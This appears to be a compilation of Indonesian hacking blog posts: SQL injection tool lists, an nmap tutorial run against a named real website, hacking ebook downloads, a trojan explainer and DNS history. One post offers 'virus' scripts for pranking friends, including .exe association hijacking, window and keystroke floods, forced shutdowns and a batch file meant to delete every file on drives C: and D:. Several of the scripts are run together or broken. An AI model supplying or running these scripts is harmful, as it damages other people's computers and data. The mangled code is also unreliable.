SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input. (de-kill.blogspot)
Untuk mempermudah dalam praktek SQL Injection ini, maka bisa menggunakan tools berikut:
1. BSQL Hacker
2. The Mole
3. Pangolin
4. SQLMap
5. Havij
6. Enema SQLi
7. SQL Ninja
8. SQL Sus
9. Safe SQL Injector
10. SQL Poizon

7. PHP injection

Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script
php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi.
Kesemuanya itu sudah terdapat dalam fungsi dari script php ini.

Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.

Jadi PHP Injection adalah mencari bugs pada script php yang ada yang dilakukan oleh sebagian hacker.

8. Script Kiddies

Script Kiddie adalah seseorang yang memiliki kemampuan kurang dalam dunia internet yang hanya bisa menggunakan tools orang lain untuk melakukan serangan terhadap jaringan internet, biasanya hanya untuk sensasi. Pada zaman sekarang ini menjadi seorang Script Kiddie tidak lah susah karena hanya dengan bermodal koneksi internet dan mengerti sedikit tentang komputer, Orang awam seperti saya pun bisa menjadi Seorang Script Kiddie karena hanya sedikit mempelajari tool-tools yang di sebar di internet dan mempelajarinya maka kita bisa menjadi Seorang Script Kiddie.

Pada zaman sekarang ini menjadi seorang Script Kiddie
tidak lah susah karena hanya dengan bermodal koneksi internet
dan mengerti sedikit tentang komputer, Orang awam seperti saya
pun bisa menjadi Seorang Script Kiddie karena hanya sedikit
mempelajari tool-tools yang di sebar di internet dan
mempelajarinya maka kita bisa menjadi Seorang Script Kiddie.

Definisi Script Kiddie

Di dunia hacker sendiri, Seorang Script Kiddie diartikan
sebagai seseorang dengan niat buruk yang menggunakan program
lain untuk menyerang sistem komputer atau pun melakukan deface
pada website.

Senjata yang Di gunakan Script Kiddie

Di Zaman ini apa pun sangat mudah di temukan di internet,
sama juga dengan senjata andalan Script Kiddie. Banyak sekali
tools yang bisa di download di internet dan dapat di gunakan
dengan mudah walau pun digunakan orang awam sekali pun seperti
saya ini.

Satu yang sangat sederhana yaitu dengan cara menscan
IP/web untuk mencari kelemahan sistem yang dapat di serang
dengan mudah, untuk menjadi Seorang script kiddie. Seseorang
tidak usah kerja hingga larut malam karena banyak tools yang
bekerja secara otomatis jadi bisa kita tinggal beraktivitas dan
kita tinggal menunggu hasil scan dari sebuah tool.

Dibawah ini adalah sedikit hal buruk yang dapat terjadi
jika sebuah sistem telah di serang:


1. Deface Web
Setelah penyusup lalu berhasil masuk ke web serve dan
mempunyai akses penuh di sebuah webs, biasanya yang di lakukan
seorang script kiddie adalah mengganti halaman utama sebuah web
dengan id nick name beserta pesan yang ditujukan buat admin web
tersebut.
Tidak hanya itu banyak para penyusup mengobrak-ngabrik isi
web sehingga web tidak lagi bisa di akses oleh pengunjung atau
tidak berjalan dengan baik lagi. hal tersebut merupakan sebuah
prestasi bagi seorang script kiddie.


2. Menginfeksi System
Salah satu contohnya melalui virus atau pun worm yang di
sebar melalui internet yang nantinya virus atau worm yang
menginfeksi sebuah komputer akan menggubah sisitem, menggambil
file-file penting yang ada pada komputer atau merusak total
sebuah computer hingga tidak bisa digunakan kembali.


3. Mengambil Password
Password dengan strong type ( mempunyai password yang sulit di
tebak ) kadang tidak berdaya jika script kiddie telah
menjalankan program keylogger atau sebuah program yang dapat
meng-enskrip sebuah password

Jika seorang script kiddie telah mendapatkan akses penuh,
maka mereka dapat sesuka hati melakukan hal apa saja, contohnya
seperti menghapus atau mencuri file-file sangat penting.

Cara menggunakan NMAP di kali linux

Cara menggunakan Nmap di kali linux

halo sob kali ini baru sempet nulis lagi karena banyak tugas, yang harusdi kerjakan jadi gak sempet deh nulisnya hehe.. {maklum curhat dikit sob}, kali ini saya akan membahas tentang  NMAP dan tentunya berhubungan denganKeamanan Jaringan, sebelum menuju ke babak selanjutnya, hehe..,, ente harus sudah faham basic jaringan ya jika belum faham bisa belajar dari sekarang agar maksud dan tujuan jelas nyangkut di otak.oh iyaa mungkin sebagian ada yang belum tahu apa itu NMAP dan buat apa NMAP itu, oke ane jelasin buat yang belum faham aja yang udah faham jangan dibaca….

Baca: Perintah Kali linux

NMAP adalah(Network Mapper) sebuah aplikasi atau tool yang berfungsi untuk melakukanport scanning. Nmap dibuat oleh Gordon Lyon, atau lebih dikenal dengan nama Fyodor Vaskovich. Aplikasi ini digunakan untuk meng-audit jaringan yang ada. Dengan menggunakan tool ini, kita dapat melihat host yang aktif, port yang terbuka, Sistem Operasi yang digunakan, dan feature-feature scanning lainnya. Pada awalnya, Nmap hanya bisa berjalan di sistem operasi Linux, namun dalam perkembangannya sekarang ini, hampir semua sistem operasi bisa menjalankan Nmap.


Kemampuan menggunakan Nmap

*.Mengumpulkan informasi setiap host atau komputer yang hidup pada jaringan lokal
*.Mengumpulkan informasi setiap ipaddress pada jaringan lokal
*.Mengumpulkan informasi setiap sistem operasi pada host maupun seluruh host pada targetjaringan
*.Menemukan setiap port yang terbuka dari host target
*.Menemukan adanya infeksi dari virus maupun malware
*.Mengumpulkan informasi mengenai layanan-layanan (service) pada host target dan server pada jaringan target.
Nmap bisa digunakan di jaringan lokal ataupun public.

bagaimana sob sudah faham apa itu NMAP langjut ke step berikutnya yaitu cara instalasi di kali linux

Cara Instalasi NMAP Di kali Linux

1.Buka Terminal linux sobat dan pastinya SuperUser(root)
2.pastikan sobat terhubung dengan internet untuk mendownload packet-paket yang dibutuhkan
3.dan kemudian masukan perintah berikut diterminal nanti ada notifikasi ketikan saja (YES) 1apt-get instal nmap

4.Tahap Instalasi sudah selesai

Bagai mana Cara menggunakan nmap di kali linux

Berikut adalah sebagian perintah menggunakan NMAP saya tidak menjelaskan semua perintah namun beberapa saja, untuk melihat perintah apa saja yang bisa digunakan sobat bisa melihat dengan mengetikkan  nmap -help atau nmap -help di terminal sobat seperti gambar dibawah ini.

Sebelumnya saya mohon maaf untuk sobat hape.com bukan maksud saya untuk membuka privasi ataupun menjatuhkan tetapi saya hanya mengambil contoh saja untuk pengetahuan tentang Keamanan Jaringan.

1.Memeriksa port yang terbuka, buka terminal sobat ketikan nmap<host/IP target> seperti gambar milik ane

gambar diatas memperlihatkan port apa saja yang terbuka seperti contoh: port 21digunakan untuk ftp dan jalurnya menggunakan TCPdan begitu juga dengan yang lain kita bisa melihat informasi apa saja port yang terbuka.

2.Memeriksa OS yang digunakan dan juga versi, skrip, dan traceroute, pada mesin target nmap -V -A   <host/IP target>

contoh seperti gambar di atas

3.Memeriksa service yang berjalan pada port nmap - sV <host/ip target> sepeti pada gambar dibawah kita

dapat melihat servis apa saja yang berjalan di server seperti: OpenSSH berjalan di port 22, Apache Mysql dan lain-lain, kita bisa memanfaatkan informasi tersebut.

Bagaimana sob mudahkan, baik untuk tahap selanjutnya akan saya tulis jangan lupa subcribe by emailjika penjelasan di atas banyak kesalah mohon komentar dibaw

Selasa, 25 Juli 2017

Download Ebook bahasa program dan Hacking Lengkap

11 ebook keren buat kamu yang ingin belajar dan mengisi waktu luang buat baca dan belajar heehee

Kesempatan kali ini Saya Akan Share ebook buku yang super mega terlengkap untuk anda.
seperti yang di judul ebook kumpulan buku bahasa program dan Hacking.
ebook ini memberikan cara-cara melakukan hacking Dan panduan untuk belajar bahasa pemrogaman bagi pemula yang ingin belajar bahasa program. anda dapat mempelajarinya dengan baik melalui ebook ini.
gratis. ebook yang isinya mega banyak ini tidak perlu lagi anda membeli buku di gramed atau toko buku,manfaatkan yang gratis saja dan nikmati sepuasnya hehehe...
nah bagi ente yang minat langsung saja comot yah!


1. Menyelam dan menaklukan samudra php
Penulis                   : Loka Dwiartara
Jumlah halaman  : 171
Size                         : 8.8MB
Format                    : pdf
DOWNLOAD

2. Belajar HTML dan CSS
Penulis                     : Rian Ariona
Jumlah halaman    : 148
Size                           : 5,7MB
Formant                    : pdf
DOWNLOAD

3. Javascript
Penulis.                 : Rajif agung yunmar S.KOM
Jumlah halaman : 16
Size                        : 570KB
Format                   : pdf
DOWNLOAD

4. Bahasa pemograman
Penulis                    : suprato
Jumlah halaman   : 597
Size                          : 3,5MB
Formant                  : pdf
DOWNLOAD

5. Sql injection
Penulis                  :
Jumlah halaman :8
Size                        : 263kb
Format                   : pdf
DOWNLOAD

6. Ajax Jquery php
Penulis                   : Desrizal
Jumlah halaman  : 78
Size                         : 1,38MB
Format                    : pdf
DOWNLOAD

7. Anti sql injection
Penulis                     :
Jumlah halaman    : 19
Size                           : 171KB
Format                      : pdf
DOWNLOAD

8. Buku sakti Hacker
Penulis                       : Efvy Zam
Jumlah halaman      :
Size                             : 9.0MB
Format                        : pdf
DOWNLOAD

9. Panduan Hacker pemula
Penulis                       : bagus
Jumlah halaman      : 118
Size                             : 7.3MB
Format                        : pdf
DOWNLOAD

10. Jaringan komputer
Penulis                        : sritrusta sukarhidoto
Jumlah halaman       : 125
Size                              : 4.7MB
Format                         : pdf
DOWNLOAD

11. Suci Hacker
Penulis                         : vanapster
Jumlah halaman        : 77
Size                               : 2.7MB
Format                          : pdf
DOWNLOAD

Semoga bermanfaat ya buat kalian,,,
Baca juga artikel sebelumnya Pengertian Hardware dan software untuk akses internet

Minggu, 23 Juli 2017

pengertian apa itu virus trojan


Mengenal apa itu virus trojan?? Apa kelebihan Trojan dibandingkan virus-virus komputer lainnya?.

Virus Trojan dapat memberikan hacker remote akses ke sistem komputer target. Operasi yang bisa di lakukan oleh seorang hacker pada sistem komputer yang di targetkan meliputi Merusak sistem komputer , misalnya dengan " layar biru kematian ", Memformat disk, menghancurkan semua isi data komputer anda, Penggunaan sistem secara otomatis seperti botnet contohnya  melakukan spamming otomatis, pencurian Uang elektronik, Menginfeksi perangkat lain yang terhubung, Pencurian data dan informasi jaringan perbankan , termasuk file rahasia, kadang-kadang untuk spionase industri , dan informasi dengan implikasi keuangan seperti password dan kartu pembayaran kredit dan Modifikasi atau penghapusan file. itulah beberapa kehebatan dari Trojan, efek yang ditimbulkan sebenarnya tergantung pada jenis-jenis trojan yang terinfeksi pada perangkat komputer anda.


Apa itu virus trojan??

Virus Trojan, atau yang sering di sebut dengan Trojan horse merupakan Sebuah bentuk Program yang menyamar sebagai aplikasi jinak . Tidak seperti virus lainnya , Trojan horse tidak mereplikasi diri mereka sendiri tetapi mereka bisa merusak dan mengurangi performa koputer anda seperti virus lainnya. Salah satu jenis yang paling berbahaya dari Trojan horse yaitu program yang mengklaim untuk membersihkan komputer Anda dari virus, tetapi malah sebaliknya bukan membersihkan melainkan memperkenalkan virus ke komputer Anda.
Dan Baca juga 30 virus yang biasa nyerang komputer anda


Kenapa di sebut Trojan horse??

Istilah trojan horse berasal dari cerita Yunani saat terjadinya peperangan dengan Troya atau trojan, Benteng pertahanan dan dinding kota troya merupakan salah satu benteng terkuat masa itu, tidak mudah menembus petahanan sekuat troya. Kemudian strategi serangan Yunani dilakukan dengan cara penyusupan tentara terkuat yunani dimasukkan kedalam kuda kayu raksasa dan memberikan nya untuk musuh mereka Trojan, seolah-olah sebagai korban keselamatan.

Tapi setelah Trojans menyeret kuda kayu raksasa ke dalam tembok kota mereka, tentara Yunani menyelinap keluar dari perut berongga kuda dan membuka gerbang kota, sehingga rekan-rekan mereka yang berada diluar gerbang dapat memasuki kota troya dan meruntuhkan semua pertahan, tentara serta seisinya.

Begitupun dengan cara penyebaran virus Trojan ini, trojan terkenal dengan mode penyusupan dan penyamarannya, mereka jarang menimbulkan gejala dan bahkan mereka tidak mudah terdeteksi sebagai program jahat. Jenis-jenis Trojan horse dibagi dan diklasifikasikan berdasarkan bagaimana mereka menyerang sistem, target dan kerusakan apa yang ditimbulkannya.


Jenis-jenis virus trojan horse

1.Remote Access Trojan

Di singkat sebagai RAT,  adalah salah satu dari tujuh jenis utama dari Trojan horse,
Remote access Trojan Di rancang untuk memberikan penyerang dengan kontrol penuh dari sistem korban. Penyerang biasanya menyembunyikan virus trojan horse ini dalam permainan dan program kecil lainnya yang tidak curiga pengguna kemudian di jalankan pada PC mereka.

 2.Data Sending Trojan

Jenis Trojan horse ini merupakan program yang di rancang untuk mendapatkan data penting dari target serangan data-data penting tersebut seperti akun, password, informasi kartu kredit, file, log alamat e-mail atau lain sebagainya.

Trojan jenis ini dapat mencari serta mengirimkan data pada pc dan computer anda, atau mereka bisa menginstal keylogger dan mengirim semua penekanan tombol terekam dan kemudian dikirimkan kembali  informasi tersebut kepada penyerang atau yang sering disebut hacker /cybercrime yang merancang virus tersebut.

3.Destruktive Trojan/trojan perusak

Trojan perusak merupakan Suatu jenis Trojan horse yang dirancang untuk menghancurkan dan menghapus file, dan lebih seperti virus dari yang lain Trojan. Hal ini sering tidak terdeteksi oleh software antivirus yang anda gunakan, apalagi apabila antivirus yang anda pakai tidak up to date.


4.Proxy trojan

Suatu jenis Trojan horse yang dirancang untuk menggunakan komputer korban sebagai server proxy . Hal ini memberikan penyerang kesempatan untuk melakukan segala sesuatu dari komputer Anda, termasuk kemungkinan melakukan penipuan kartu kredit dan kegiatan ilegal lainnya, atau bahkan menggunakan sistem anda untuk memulai serangan berbahaya terhadap jaringan lain.

5. File Transfer Protocol (FTP)

Suatu jenis Trojan horse dirancang untuk membuka pelabuhan 21 (file transfer protokol) dan memungkinkan penyerang terhubung ke komputer anda menggunakan File Transfer Protocol (FTP).

6. Security software disabeler trojan


Suatu jenis Trojan horse berhenti dirancang atau membunuh keamanan program seperti program antivirus atau firewall tanpa pengguna mengetahui. Jenis Trojan ini biasanya dikombinasikan dengan jenis lain dari Trojan sebagai payload

7. DoS attack

Denial of Service attack atau Serangan DoS, merupakan jenis serangan pada jaringan yang dirancang untuk membawa jaringan down dengan membanjiri lalu lintas. Banyak serangan DoS, seperti Ping of Death dan Teardrop serangan, memanfaatkan keterbatasan dalam TCP / IP protokol. Untuk semua serangan DoS dikenal, ada perbaikan perangkat lunak administrator sistem dapat menginstal untuk membatasi kerusakan yang disebabkan oleh serangan. Tapi, seperti virus , serangan DoS baru yang terus-menerus oleh hacker .

Baca juga artikel sebelumnya Cara buat virus sederhana tap Efeknya berbahaya


  • Karena efek kerusakan yang dia aibatkan oleh trojan sangat berat maka sebaiknya anda memakai anti virus terbaik dan pastikan antivirus yang anda gunakan selalu uptodate. Sekian pembahasan tentang apa itu Virus Trojan, dan jenis-jenis trojan horse.

Cara buat virus sederhana tapi Efeknya berbahaya

Nah sobat kali ini saya akan share cara membuat virus menggunakan notepad dan cmd.

Virus ini bisa di gunakan untuk ngerjain teman dan ada juga yang cukup berbahaya sobat, saya share ini hanya sekedar ingin berbagi pengetahuan kepada sobat sekalian, siapa tau berguna dan bermanfaat bagi sobat dan supaya sobat juga tau kalau notepad dan cmd bawaan dari windows bisa di gunakan untuk membuat virus. oke sobat, langsung akan saya jelaskan...

1.Saya akan menjelaskan cara membuat virus menggunakan CMD : Buka program cmd nya melalui klik start - run - ketik cmd atau bisa melalui keyboard dengan mengetik key windows+ R lalu ketik cmd dan dan tekan enter lalu ketikan script berikut di cmd "ASSOC.exe=.hank" tanpa tanda petik lalu tekan enter! nah, ini membuat program/aplikasi yang berexstensi .exe tidak mau jalan, seperti game, dll. Tapi tenang, ini bisa dikembalikan seperti semuala dengan cara buka cmd nya lagi lalu ketik"ASSOC.exe=EXEFILE" trik ini bisa untuk ngerjain teman sobat, ya cuma buat iseng-iseng.

2. Sekarang saya akan menjelaskan cara membuat virus menggunakan Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke notepad : ------

Star

Star

Star

Star

Star

Star

Star

Star

Star

Star

Star


Nah, selanjutnya simpan di notepad dengan nama apa sajadengan exstensi .bat contoh :"eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini membuat komputer menjadi eror, karena akan membuka CMD yang banyak jika file "eror.bat" itu di buka.

3. Masih di notepad, sekarang saya akan jelaskan cara membuat notepad terbuka secara otomatis, silahkan ketik/copas kode script berikut ke notepad :



@ECHO off:top START%SystemRoot%\system32\notepad.exe  GOTO top


Simpan di notepad dengan nama apa saja dengan exstensi.bat sama seperti yang tadi, contoh "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini akan membuat notepad terbuka dengan sendirinya secara otomatis.

4. Masih menggunakan notepad, yang sekarang cara membuat tombol backspace menjadi eror menekan terus menerus secara otomatis, langsung saja copas/ketik kodescript berikut ke notepad :


MsgBox "kembali ke menu sebelumnya"Set wshShell=wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop


Simpan kode script tersebut di notepad dengan nama apa sajayang penting tidak lupa menuliskan exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini membuat tombol backspace menjadi eror dan menekan dengan sendiri nya.

5. Masih menggunakan notepad, trik sekarang bisa membuat CD/DVD Room buka tutup dengan sendiri nya, langsung aja copas/ketik kode script berikut ke notepad :

Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop

Simpan kode tersebut di notepad dengan nama bebas dan tambahkan exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadi All Files, maka akan bisa membuat CD/DVD Room buka tutup dengan sendirinya secara otomatis.


6. Trik kali ini bisa membuat Caps Lock menyala terus menerus tak terkendali, langsung saja copas/ketik kodescript berikut di notepad :

Set wshShell=wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys"{CAPSLOCK}"loop


Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika File ini di buka akan membuat Caps Lock menyala terus menerus.

7. Trik yang ke tujuh, membuat komputer menjadi shoutdown dengan kata lain mati, langsung saja ini script nya copas ke notepad :

Z@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s




Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika file ini di buka akan membuat komputer shoutdown atau mati.

8.Trik yang ini sama dengan trik yang nomor 7 hanya saja yang ini isi waktu, langsung saja copas/ketik kode script berikut ke notepad :




@echo shutdown -s -t 1 -f 




Simpan kode script tersebut dengan nama bebas dan dengan exstensi .bat lain dengan trik yang no 7, contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Maka jika file ini dibuka akan sama dengan no 7 yaitu membuat komputer Shoutdown, hanya saja yang membedakan adalah yang ini berisi waktu, lihat angka pada kode script tersebut yang berwarna biru, itu adalah waktu yang dibutuhkan untuk mematikan komputer, bisa di atur sesuai keinginan (1 = 1 detik)

9. Kali ini trik yang lumayan berbahaya, karena komputer akan dipenuhi oleh 100000000

tourstart yang akan memenuhi layar monitor dan akan membuat komputer menjadi hang,
untuk mengatasinya dapat mendelete semua tourstart tersebut atau langsung merestart
komputer. Silahkan copas/ketik kode script berikut ke notepad :



option explicit 
dim wshshell 
set wshshell=wscript.createobject(“wscript.shell”) 
dim x 
for x = 1 to 100000000 
wshshell.run “tourstart.exe” 
next



Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs" tanpa tanda kutip dan Save As type ganti menjadi All Files. Pada angka yang saya beri wara biru, itu bisa di ganti sesuai keinginan, bisa dibuat menjadi 100 atau 1000 saja, dan begitu file ini dibuka akan membuat tourstart sesuai dengan angka yang ditulis pada kode tesebut,

10. Nah Yang terakhir ini, saya rasa paling berbayaha, karena dapat menghapus seluruh data di hardisk tanpa terkecuali, sehingga mau tidak mau ya harus instal ulang, langsung saja copas/ketik kode script berikut di notepad



@echo off
DEL C: -Y
DEL D: -Y



Simpan dengan nama bebas dan exstensi .bat contoh "virus.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK karena bisa berakibat fatal bagi komputer anda.


Oke..itulah beberapa cara membuat virus menggunakan notepad dan cmd, agar dapat dipergunakan dengan baik, dan agar sobat dapat berhati-hati jika melihat ada file di komputer sobat yang berexstensi .bat atau .vbs siapa tau teman atau orang dekat sobat iseng-iseng




Jumat, 21 Juli 2017

Pengertian Mengenal DNS (Domain Name System)

DNS (Domain Name System),
Dan Pengrtian Tentang Ip Address Sejarah Singkat


A. Sejarah singkat DNS (Domain Name System)
Penggunaan nama sebagai pengabstraksi alamat mesin di sebuah jaringan komputer yang lebih dikenal oleh manusia mengalahkan TCP/IP, dan kembali ke zaman ARPAnet. Dahulu, seluruh komputer di jaringan komputer menggunakan file HOSTS.TXT dari SRI (sekarang SIR International), yang memetakan sebuah alamatke sebuah nama (secara teknis, file ini masih ada - sebagian besar sistem operasi modern menggunakannya dengan baik secara baku maupun melalui cara konfigurasi, dapat melihat Hosts file untuk menyamakan sebuah nama host menjadisebuah alamat IP sebelum melakukan pencarian via DNS). Namun, sistem tersebut di atas mewarisi beberapa keterbatasan yang mencolok dari sisi prasyarat, setiap saat sebuah alamat komputer berubah, setiap sistem yang hendak berhubungan dengan komputer tersebut harus melakukan update terhadap file Hosts.Dengan berkembangnya jaringan komputer, membutuhkan sistem yang bisa dikembangkan: sebuah sistem yang bisa mengganti alamat host hanya di satu tempat, host lain akan mempelajari perubahan tersebut secara dinamis. Inilah DNS.Paul Mockapetris menemukan DNS di tahun 1983; spesifikasi asli muncul di RFC 882 dan 883. Tahun 1987, penerbitan RFC 1034 dan RFC 1035 membuat updateterhadap spesifikasi DNS. Hal ini membuat RFC 882 dan RFC 883 tidak berlaku lagi. Beberapa RFC terkini telah memproposikan beberapa tambahan dari protokol inti DNS.Referensi yang baik tentang hal ini dapat di baca di RFC 2901, "Guide to Administrative Procedures of the Internet Infrastructure."
IP address dan penomoran yang terkait dengan TCP/IP, sejarahnyadi atur oleh Internet Assigned Numbers Authority (IANA). Fungsi IANA sebetulnya di lakukan oleh satu orang, yaitu, John Postel almarhum.Domain name di berikan oleh authorotas Top Level Domain (TLD). Sampai dengan April 1998, Internet Network Information Center (InterNIC) mengatur domain name dan memiliki authoritas atas nama-nama ini dengan dibantu banyak Network Information Center (NIC) diseluruh dunia untuk menghandle non-US domain. InterNIC bertanggung jawab atas untuk mengkoordinasikan dana manajemen dari Domain Name System (DNS).InterNIC adalah contoh menarik perubahan yang terjadi di Internet. Sejak awal 1993, Network Solutions, Inc. (NSI) menjadi tempat pendaftaran dari InterNIC atas nama NSF dan mempunyai hak authoritas eksclusif untuk domain.com, .org, .net, dan .edu. Kontrak NSI habis bulan April 1998 dan di perpanjang beberapa kali karena tidak ada lembaga lain yang mau meneruskan proses registrasi domain tersebut. Kontrak NSI akhirnya di perpanjang sampai September 2000, walaupun bisnis registrasi domain dibuka untuk kompetisi bulan Juni 1989.Pada saat kontrak awal NSIselesai, proses pemberian IP address dilanjutkan olehAmerican Registry for Internet Numbers (ARIN). Bulan Maret 2000 akhirnya NSI di beli oleh VeriSign.Badan baru yang mengatur registrasi global Top Level Domain (gTLD) adalah Internet Corporationfor Assigned Names and Numbers (ICANN). Dibentuk bulan Oktober 1998, adalah organisasi yang diu bentuk oleh U.S. National Telecommunications and Information Administration (NTIA) untuk mengatur DNS. Meskipun menimbulkan banyak kontroversi di awalnya, ICANN menerima banyak dukungan dari industri. ICANN di bentuk dengna beberapa organisasi pendukung untuk membentuk kebijakan dari wilayah tanggung jawabnya, termasuk Domain Names Support Organization (DNSO), IP addresses (ASO), dan protocol parameter assignments (PSO).21 April 1999, ICANN mengumumkan lima perusahaan yang terpilih sebagai bagian dari SharedRegistry System yang kompetitif untuk domain.com, .net, dan .org, yaitu:
1.                       America Online, Inc. (U.S.)

2.                       CORE (Internet Council of Registrars) (International)

3.                       France Telecom/Oléane (France)

4.                       MelbourneIT (Australia)

5.                       register.com (U.S.)

Phase I dari program testbed competitif registrardi jadwalkan untuk berjalansampai Juni 1999, walaupun akhirnya di perpanjang sampai Agustus 1999. Di akhir phase I, Shared Registry System untuk domain.com, .net, dan .org terbukauntuk semua domain registrar yang terakreditasi ICANN. Di akhir 1999, ICANN menambahkan 29 registrar. Hari ini, lebih dari 100 registrar domain yang terakreditasi ICANN. Informasi lebih lanjut dapatdi peroleh di situs Web ICANN

B. Pengertian Beberapa Bagian dari nama domain
Sebuah nama domain biasanya terdiri dari dua bagian atau lebih (secara teknis disebut label), dipisahkan dengan titik. Label paling kanan menyatakan top-level domain - domain tingkat atas/tinggi (misalkan, alamat www.wikipedia.org memiliki top-level domain org).Setiap label di sebelah kirinya menyatakan sebuahsub-divisi atau subdomain dari domain yang lebih tinggi. Catatan:"subdomain" menyatakan ketergantungan relatif, bukan absolut. Contoh:wikipedia.org merupakan subdomain dari domain org, dan id.wikipedia.org dapat membentuk subdomain dari domain wikipedia.org (pada praktiknya, id.wikipedia.orgsesungguhnya mewakili sebuah namahost - lihat dibawah). Secara teori, pembagian seperti ini dapat mencapai kedalaman 127 level, dan setiap label dapat terbentuk sampai dengan 63 karakter, selama total nama domain tidak melebihi panjang 255 karakter. Tetapi secara praktik, beberapa pendaftarnama domain (domain name registry) memiliki batas yang lebih sedikit.Terakhir, bagian paling kiri dari bagian nama domain (biasanya) menyatakan nama host. Sisa dari nama domain menyatakan cara untuk membangun jalur logis untuk informasi yang dibutuhkan; nama host adalah tujuan sebenarnya dari nama sistem yang dicari alamat IP-nya. Contoh: nama domain www.wikipedia.org memiliki nama host "www".DNS memiliki kumpulan hierarki dari DNS servers. Setiap domain atau subdomain memiliki satu atau lebih authoritative DNS Servers (server DNS otorisatif) yang mempublikasikan informasi tentang domain tersebut dan nama-nama server dari setiap domain di-"bawah"-nya. Pada puncak hirarki, terdapat root servers- induk server nama: server yang ditanyakan ketika mencari (menyelesaikan/resolving) dari sebuah nama domain tertinggi (top-level domain).Struktur hirarki dari domain name akan mudah di mengerti jika di baca darikanan-ke-kiri. Semua nama host Internet di akhiridengantop-level domainname. Generik top-level domain (TLD) global termasuk:
1.             .com: organisasi komersial (di atur oleh VeriSign Global Registry Services melalui Shared Registry System).

2.             .edu: institusi pendidikan; umum terbatas pada akademi 4-tahun dan universitas (diatur oleh EDUCAUSE).

3.             .net: network provider; tahun 1994 s/d 2001 terbatas pada host yang menjadi bagianoperasional jaringan Internet. Saat ini terbuka untuk siapapun(di atur oleh VeriSign Global Registry Services melalui Shared Registry System).

4.             .org: organisasi non-profit (di atur oleh VeriSign; sesudah January 2003, di atur oleh Public Interest Registry (PIR), sebuah organisasi yang dibentuk oleh ISOC dengan control operasional di subkontrakan ke Afilias, operator dari domain  .info)

5.             .int: organisasi yang di bentuk oleh perjanjian internasional.

6.             .gov: Lembaga pemerintah federal U.S. (diatur oleh U.S. General Services Administration, termasuk domain fed.us)

7.             .mil: militer U.S. (diatur oleh U.S. Department of Defense Network Information Center)

Tata cara untuk memilih hostname di terangkan di RFC 1178.Top-level domain lain menggunakan kode negara dua huruf yang di definisikan oleh ISO standard 3166. Beberapa diantara-nya adalah .id Indonesia, .jp Jepang, .ca Canada, .de Jerman, .es Spanyol, .fr Perancis, .gb Inggris, tapi karena sejarah tampaknya .uk lebih disukai daripada .gb, termasuk .us Amerika Serikat. Penting untuk di catat bahwa tidak ada hubungan antara kode negara dengan lokasi fisik host / komputer, jadi tidak harus host .id berada di Indonesia.

1.      Badan yang mengatur pemberian IP Address & mengkoordinasikan DNS serta pendelegasian nama domain Internet di seluruh dunia adalah Internet Assigned Number Authority / IANA (http://www.iana.org)

2.      Pemberian IP Address dibagi menjadi berdasarkan daerah (regional) masing-masing dan disebut dengan Regional Internet Registries (RIR)

Pada saat ini ada beberapa registry yang bertanggung jawab untuk mengalokasikan IP address dan kebijakan domain name di dunia masing masing regional yaitu, American Registry for Internet Numbers (ARIN), awalnya bertanggung jawab untuk seluruh Amerika dan sebagian dari Afrika. Tahun 2002, Latin American and Caribbean Internet Addresses Registry (LACNIC) secara resmi di akui dan mengcover Amerika Tengah dan Selaran, termasuk beberapa negara Caribia. African Regional Internet Registry (AfriNIC), pada saatnya akan bertanggung jawab untuk sub-Sahara Afrika. Pada akhirnya nanti, ARIN hanya akan mengcover Amerika Utara dan sebagian Caribia.Registry Europa dan Asia-Pacific di atur oleh Réseaux IP Européen (RIPE) dan Asia-Pacific NIC(APNIC).Berbagai negara dapat mengatur subdomain di negara masing-masing sesuai dengan kemauannya. Di Indonesia menggunakan subdomain.co.id, .ac.id, .or.id mirip dengan di Inggris. Karena tekanan aktifitas komersial,besarnya jaringan, dan penggunaan internasional menyebabkan banyak kontroversi terutama masalah merek dagang maupun konflik pengakuanatas nama. Bulan November 1996, Internet International Ad Hoc Committee (IAHC) dibentukuntuk menyelesaikan masalah nama dan menjadi titik fokal perdebatan internasional untuk pembentukan registry penamaan global maupun global gTLD. Mei 1997, IAHC di bubarkan setelah berhasil mempublikasikan Generic Top Level Domain Memorandum of Understanding framework. Council of Registrars (CORE) sebuah badan operasional yang terdiri dari semua registrar dibentuk atas gTLD-MoU framework.November 2000, beberapa TLD baru pertama kali di approve oleh ICANN, yang pertama online bulan Oktober 2001. Tujuh TLD yang baru tersebut adalah:

